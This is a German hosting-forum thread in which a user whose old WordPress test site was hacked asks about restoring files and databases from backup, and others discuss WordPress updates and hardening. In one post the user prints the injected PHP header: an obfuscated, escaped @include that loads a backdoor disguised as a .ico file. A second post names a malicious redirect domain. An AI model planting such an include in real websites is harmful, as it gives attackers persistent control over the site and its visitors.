Ankündigung

Einklappen
Keine Ankündigung bisher.

Domain gehackt (Backup)

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

    Domain gehackt (Backup)

    Hallo!

    Irgendein chinesischer Witzbold hat meine Domain gehackt und sämtliche Dateien verändert.

    Ich will nun alle Dateien löschen und das Backup herstellen.

    Nun meine Frage,

    Was muss ich beim Restore-Auftrag für den Ordner angeben, wenn ich will dass alle Ordner aus dem Backup hergestellt werden sollen?

    Ein / wird nicht angenommen.

    cu

    #2
    Hab es gefunden. Wird wohl der Hauptpfad sein - > (mit Unterordnern) /kunden/xxxxx_xxxxx/
    Immer wieder lustig zu sehen, was passiert, wenn man nicht das aktuellste Wordpress aufspielt. Derweil hatte ich das Ding eigentlich nur als Testpage laufen.
    Zuletzt geändert von Christian P.; 29.09.2019, 12:07.

    Kommentar


      #3
      Zitat von Christian P. Beitrag anzeigen
      Immer wieder lustig zu sehen, was passiert, wenn man nicht das aktuellste Wordpress aufspielt.
      Welche Version von Wordpress war das denn? Sofern da hin- und wieder das Wordpress-Script durch Besucher angestoßen wird, gibt es doch automatische Updates bei Wordpress.

      Kommentar


        #4
        Hallo Chrisitan P.

        passt jetzt alles? Ich habe eben kurz probiert, bei mir wird / genommen. Es ist technisch gesehen zwar völlig richtig was Sie schreiben mit /kunden/xxxxx_xxxxx/, macht es für nicht so versierte Kunden aber schwer. Daher wäre es nett, wenn Sie einen Screenshot der Fehlermeldung bzw. der Seite machen könnten, falls es reproduzierbar ist. Dann würde ich dem gerne nachgehen wollen.

        Mit freundlichen Grüßen

        Nils Dornblut

        Blog - Facebook - Twitter
        Communitybetreiber: domainfactory GmbH
        Impressum / Pflichtangaben

        Kommentar


          #5
          Die Angabe von / funktioniert. Ich hatte am Anfang eine Fehlermeldung, die ich irrtümlicherweise auf den Pfad zurückführte.

          Bei dem Hack handelt es sich vermutlich um diesen hier.

          https://secure.wphackedhelp.com/blog...-hack-cleanup/

          Dabei platziert der Angreifer überall in sämtlichen Verzeichnissen Mod-Rewrites per .htaccess, die dann unter anderem auf diese Seite führen.

          http://crazytds.club/redirect.php

          Was da noch alles modifiziert wurde, kann ich nicht sagen. Ich habe sowohl das Webverzeichnis als auch die Datenbanken lokal gesichert und danach online vollständig gelöscht.

          Sobald domainFactory das Backup herstellt, sperre ich den Zugriff und entferne danach die Wordpress-Installation.

          Es handelte sich um eine ältere Installation, die ich irgendwo auf einem parallelen Pfad hatte und nur für Testzwecke vor Monaten installiert hatte.

          Wie genau der Hacker von der Installation Wind bekam, weiß ich nicht.

          Kommentar


            #6
            Zitat von Christian P. Beitrag anzeigen
            Die Angabe von / funktioniert. Ich hatte am Anfang eine Fehlermeldung, die ich irrtümlicherweise auf den Pfad zurückführte.
            Okay, danke für die Rückmeldung.

            Mit freundlichen Grüßen

            Nils Dornblut

            Blog - Facebook - Twitter
            Communitybetreiber: domainfactory GmbH
            Impressum / Pflichtangaben

            Kommentar


              #7
              Zitat von jelox Beitrag anzeigen
              Welche Version von Wordpress war das denn? Sofern da hin- und wieder das Wordpress-Script durch Besucher angestoßen wird, gibt es doch automatische Updates bei Wordpress.
              Wie gesagt. Es handelte sich um eine alte Wordpress-Installation, die von einer privaten Subdomain erreichbar war. Da es sich nur um eine Testinstallation handelte, wurde die Seite natürlich nicht besucht. Irgendwie hat der Angreifer diese Subdomain gefunden.

              Keine Ahnung, wie er das geschafft hat, weil es eigentlich eine private Adresse war, die nur 2 Personen kennen.

              Natürlich hatte ich keine Quota dafür eingerichtet, so dass der Angreifer mir den ganzen Webspace verseuchen konnte.

              Soweit ich nun die gehackte Seite mit der sauberen vergleichen konnte, hat der Angreifer neben jeder Menge Mod-Rewrites auch verschlüsselte PHP-Dateien hinterlegt.

              In jedem Verzeichnis wurden index.php-Dateien hinterlegt oder modifiziert, mit folgendem Header

              Code:
              <?php
              /*8dfc1*/
              
              @include "\057kund\145n/x9\xxxx7_8\0xxxxx/\163un-p\16254\164s.de\061.ff/\162obot\151cs/e\170tens\151ons/\115ath/\05621ea\0611d2.\151co";
              
              /*8dfc1*/
              
              ?>
              Der String ist absichtlich teilweise escaped, so dass er nicht richtig lesbar ist.

              Dekodiert führt er aber in ein Unterverzeichnis, in dem als ***.ico Datei der Trojaner Backdoor:PHP/CryptInject.YA hinterlegt wurde.

              Der ganze PHP-Code ist per Obfuscater unlesbar gemacht.

              Im Prinzip ist das der bekannte Wordpress-Hack.

              https://www.getastra.com/e/malware/i...rdpress-drupal

              Das war das letzte Mal, dass ich Wordpress benutze. Diese Software ist ein Virenmagnet sondergleichen!
              Zuletzt geändert von Christian P.; 30.09.2019, 21:52.

              Kommentar


                #8
                Hallo Christan P.,

                danke noch für die umfangreichen Ausführungen. Leider ist gerade Wordpress sehr beliebt, weil es vergleichsweise hohe Installationen gibt.

                Mit freundlichen Grüßen

                Nils Dornblut
                Blog - Facebook - Twitter
                Communitybetreiber: domainfactory GmbH
                Impressum / Pflichtangaben

                Kommentar


                  #9
                  Zitat von Christian P. Beitrag anzeigen
                  Das war das letzte Mal, dass ich Wordpress benutze. Diese Software ist ein Virenmagnet sondergleichen!
                  Wie Nils schon sagte: Wenn eine Software viel genutzt wird, dann konzentrieren sich auch Angreifer eher darauf. Ähnliches Thema wie bei Betriebssystemen.

                  Man sollte da auch schon fair sein und zugeben selbst sehr fahrlässig gehandelt zu haben: Keine Quota, keine aktuelle Version und offenbar auch kein Basic- oder Digest-Auth.
                  Eine Subdomain, die "keiner kennt" ist nun mal kein wirklicher Schutz.

                  Kommentar


                    #10
                    Klar war das offensichtlich fahrlässig.

                    Aber ein CMS, das permanent durch schwere Sicherheitslücken in Erscheinung tritt, ist für die Mülltonne!

                    Es waren keine Addons installiert. Die Version war nur einige Monate alt und prompt kann ein Hacker das komplette System übernehmen.

                    Da kannst du sagen was du willst, aber Wordpress hat ein ernsthaftes Problem mit der Sicherheit.

                    Kommentar


                      #11
                      Zitat von Christian P. Beitrag anzeigen
                      Es waren keine Addons installiert. Die Version war nur einige Monate alt und prompt kann ein Hacker das komplette System übernehmen.
                      Klar, WP ist leider so gewachsen dass an vieles nicht gedacht wurde. Nicht nur was die Security angeht, sondern eher die Funktionen.
                      Es gibt auch durchaus besser durchdachte CMS die aber bei dF leider teils auch nicht mehr rund laufen. (Siehe den Contao-Thread)

                      Über "nur" lässt sich aber wieder streiten. Eine funktionierende Installation aktualisiert sich innerhalb der Hauptversionen eigentlich automatisch.
                      Wenn man so wenig Besucher hat, dass der WP-Cron nicht anschlägt sollte man aber auch überlegen ob überhaupt ein dynamisches CMS notwenig ist oder ob eine Static-Site-Generator nicht reicht.
                      Ansonsten könnte man die Installation natürlich auch über MainWP oder so anbinden. Das checkt dann regelmäßig und löst je nach Einstellung auch direkt ein Update aus.

                      Kommentar


                        #12
                        Zitat von Lukas M. Beitrag anzeigen
                        Wenn man so wenig Besucher hat, dass der WP-Cron nicht anschlägt sollte man aber auch überlegen ob überhaupt ein dynamisches CMS notwenig ist oder ob eine Static-Site-Generator nicht reicht.
                        Na ja, eine WordPress-Testinstallation durch einen Generator für statische Seiten zu ersetzen, erscheint mir jetzt auch nicht wirklich praktikabel...

                        Auch bei mir flogen bis zum Umzug noch ein paar alte Testinstallationen diverser Systeme herum. Allerdings durch Passwortschutz abgesichert (.htaccess / Basic Auth) und jeweils in einer eigenen Quota - sonst wäre mir das zu heikel gewesen.

                        Gruß
                        Jan
                        Two hours of trial and error can save ten minutes of manual reading.

                        Kommentar


                          #13
                          Übrigens ist der Restore wirklich toll, was die MySQL-Datenbanken anbelangt.

                          Im Formular steht:

                          MySQL-Datenbank, die wiederhergestellt werden soll:

                          Was genau trägt man hier bitte ein, wenn mehr als eine DB hergestellt werden soll?

                          Ich habe leider das Falsche eingetragen und nun ist die zweite DB für immer weg.
                          Zuletzt geändert von Christian P.; 13.10.2019, 01:23.

                          Kommentar


                            #14
                            Zitat von Christian P. Beitrag anzeigen
                            Übrigens ist der Restore wirklich toll, was die MySQL-Datenbanken anbelangt.

                            Im Formular steht:

                            MySQL-Datenbank, die wiederhergestellt werden soll:

                            Was genau trägt man hier bitte ein, wenn mehr als eine DB hergestellt werden soll?

                            Ich habe leider das Falsche eingetragen und nun ist die zweite DB für immer weg.
                            In dem Fall müssen eigentlich mehrere Anträge gestellt werden, weil sich der Aufwand ja auch entsprechend vervielfacht. Ist die Info, dass wirklich nichts mehr geht von uns? Wenn nicht, fragen Sie bitte explizit nach und wir schauen, was wir noch so haben.

                            Mit freundlichen Grüßen

                            Nils Dornblut
                            Blog - Facebook - Twitter
                            Communitybetreiber: domainfactory GmbH
                            Impressum / Pflichtangaben

                            Kommentar

                            Lädt...
                            X